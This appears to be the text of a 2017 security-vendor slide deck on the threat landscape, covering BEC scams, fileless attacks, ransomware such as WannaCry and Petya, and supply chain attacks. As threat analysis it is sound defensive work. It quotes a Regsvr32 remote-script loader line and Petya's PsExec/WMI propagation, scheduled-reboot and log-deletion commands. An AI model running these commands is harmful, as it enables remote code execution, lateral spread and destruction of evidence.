Threat landscape update: June to September 2017

Presenter Date
Threat Landscape
Q2 / 2017 Update
Asim Rab
Candid Wueest
Sept 2017

2Copyright © 2017 Symantec Corporation
General trends
Simple, but successful
o Low-tech attacks (BEC)
o Living off the land and fileless
o Emails with social engineering
Focused and selective
o More ransomware in corporations
o Selective spreading of malware
o Attacking supply chain companies

o More than 2 Million new malware variants per day
o Script malware leads to many variants
Malware statistics Region % of global
USA 27.26%
Japan 6.49%
China 6.04%
India 5.82%
Brazil 4.12%
Germany 3.97%
Great Britain 3.59%
Canada 2.65%
France 2.55%
Russia 2.32%
Australia 2.17%
Italy 2.03%
Mexico 1.67%
South Korea 1.34%
Turkey 1.28%
Netherlands 1.27%
Spain 1.26%
Indonesia 1.11%
Poland 1.08%
Taiwan 0.90%
0.0
10.0
20.0
30.0
40.0
50.0
60.0
70.0
80.0
90.0
100.0
January February March April May June July August
New
malware
variants per
month in
millions

Web attacks still elevated
0
200,000
400,000
600,000
800,000
1,000,000
1,200,000
1,400,000
January February March April May June July August
o Normally no 0-days exploits used
o RIG toolkit is most active
o Link spread by email or
advertisement
o Sometimes infections are
restricted to specific IP addresses
o Supply chain attacks increased
Web attacks blocked per day

Malicious doc containing
macro with social engineering
Malicious documents still common
5
Embedded binary can be
double clicked

o More than half of the malicious attachments are script files
o Macros or JavaScript are usually downloading final payload
o Most common payloads are ransomware and financial Trojans
Email
Email
e.g. invoice or receipt
Attachment
e.g. JavaScript
Downloader
e.g. PowerShell
Payload
e.g. Ransomware
Whitepaper available

Section
Business Email
Compromise
(BEC)
2

4.3
6.8
4.5 5.1
5.9 4.6
0.0
1.0
2.0
3.0
4.0
5.0
6.0
7.0
8.0
Jan Feb Mar Apr May Jun
BEC email received per targeted organization
Low-tech attacks: Business email compromise
o Spear-phishing taken to the next level
o Convince the company to perform a payment transaction
o Scams often use typo-squatted domains
o Some attacks change the IBAN in invoices
o Exposed losses Oct 2013 – Dec 2016 was over $5bn
o 8,000 businesses targeted monthly

Create a sense of urgency, requiring
immediate action, attempting to
pressure the recipient into action
BEC subject lines
Top three subjects
feature in 2/3 of all
emails
PAYMENT
URGENT
REQUEST

Section
Living off the land
3

When attackers turn what you have against you
o Fewer new files on disk
o more difficult to detect attack, no IoC to share
o Use off-the-shelf tools & cloud services
o difficult to determine intent & source
o These tools are ubiquitous
o hiding in plain sight
o Finding exploitable zero-day vulnerabilities is getting
more difficult
o use simple and proven methods such as email & social
engineering
Living off the land
11

Multiple fileless options exist but not all are truly fileless
Fileless attacks
e.g. remote code exploits such as EternalBlue and CodeRedMemory only attacks
Fileless loadpoint
Non-PE files
Dual-use tools
Documents containing macros, PDFs with JavaScript and scripts
(VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things

Living off the land attack chain
Exploit in memory
e.g. SMB EternalBlue
Email with Non-PE file
e.g. document macro
Weak or stolen credentials
e.g. RDP password guess
Incursion
Remote script dropper
e.g. LNK with PowerShell from cloud
Memory only malware
e.g. SQL Slammer
Non-persistent
Persistent
Persistence
Fileless persistence loadpoint
e.g. JScript in registry
Traditional methods
Payload
Regular non-fileless payload
Non-PE file payload
e.g. PowerShell script
Memory only payload
e.g. Mirai DDoS
Dual-use tools
e.g. netsh or PsExec.exe

o Scripts are very common, especially PowerShell
o Many script toolkits available, e.g. PS Empire
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be adapted quickly
Non-PE files

Fileless loadpoints
o Registry run key can point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Downloder.Dromedan (40,000 detections per day)
o Embedded JScript uses WMI to execute a
PowerShell payload
o Script stores encoded DLL in the registry
for later use
Example: Remote SCT load
Malicious.sct file

Section
Ransomware
4

Ransomware stats
o Ransomware is still profitable and common
o Multiple self-propagating variants appeared
0
10,000
20,000
30,000
40,000
50,000
60,000
70,000
80,000
90,000
Jan-16
Feb-16
Mar-16
Apr-16
May-16
Jun-16
Jul-16
Aug-16
Sep-16
Oct-16
Nov-16
Dec-16
Jan-17
Feb-17
Mar-17
Apr-17
May-17
Jun-17
Trend Line
Other
Countries
31%
United States
29%
Japan
9%
Italy
8%
India
4%
Germany
4%
Netherlands
3%
UK
3%
Australia
3%
Russia
3%
Canada
3%

o 42% of ransomware infections in 2017 were in enterprises
o Due to WannaCry and Petya
o Attacks against cloud storage increased
Ransomware in enterprises
0
10,000
20,000
30,000
40,000
50,000
60,000
Jan-16 Feb-16 Mar-16 Apr-16 May-16 Jun-16 Jul-16 Aug-16 Sep-16 Oct-16 Nov-16 Dec-16 Jan-17 Feb-17 Mar-17 Apr-17 May-17 Jun-17
Consumer Enterprise

o 1 Billion EternalBlue infection attempts blocked
o Profit $140K, Bitcoin accounts emptied August 3rd
o Linked to Lazarus group
WannaCry
0
20000
40000
60000
80000
100000
120000

o Petya (June variant) classified as a wiper
o Semi-targeted infections through supply chain hack (MEDoc)
o Profit $10K, Bitcoin account emptied July 4th
Petya
0
20
40
60
80
100
120
140
160

o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o [server_name]admin$perfc.dat
o psexec rundll32.exe c:windowsperfc.dat #1 [RANDOM]
o Uses WMI to propagate if PsExec fails
o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create
“%System%rundll32.exe “%Windows%perfc.dat" #1 60”
o Scheduled task to restart into the malicious MBR payload
o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traces
o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools

Section
Targeted attack groups
5

o Active since December 2015 in Europe and North America
o Ongoing attacks against energy sector, mainly in Turkey and U.S.
Infiltration
o Compromised websites and spear phishing (Phishery toolkit)
o Trojanized software, using Shelter evasion framework
o Various backdoors:
Dragonfly 2.0
• Trojan.Listrix
• Trojan.Credrix
• Backdoor.Goodor
• Backdoor.Dorshell
• Trojan.Karagany.B
• Trojan.Heriplor
Slide deck available

o Uses living off the land tactics
o PowerShell, PsExec, and BITSAdmin
o Phisherly toolkit became available on GitHub in 2016
o Document used SMB template link to leak credentials
o Screenutil and Shelter are available online
Goal
o Information stealing: passwords, documents and screenshots
o Potential for sabotage attacks
Dragonfly 2.0

o Many cases where legitimate software was compromised
o Fast and semi-targeted distribution through update process
o Trojanized updates are difficult to discover
o Trusted domain, digitally signed, trusted update process,…
Examples:
o MEdoc (Petya June/2017)
o CCleaner (Aug/2017)
o Python modules (Sept/2017)
o ICS supplier (Dragonfly 2014)
Supply chain attacks increasing

o Cybercriminals are focusing on simple but effective methods
o Ransomware is still very prevalent
o Living off the land tactics are increasingly used
o Often targeted infections with limited distribution
Summary

Threat landscape update: June to September 2017

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Destaque

Destaque (6)

Semelhante a Threat landscape update: June to September 2017

Semelhante a Threat landscape update: June to September 2017 (20)

Último

Último (20)

Threat landscape update: June to September 2017

Notas do Editor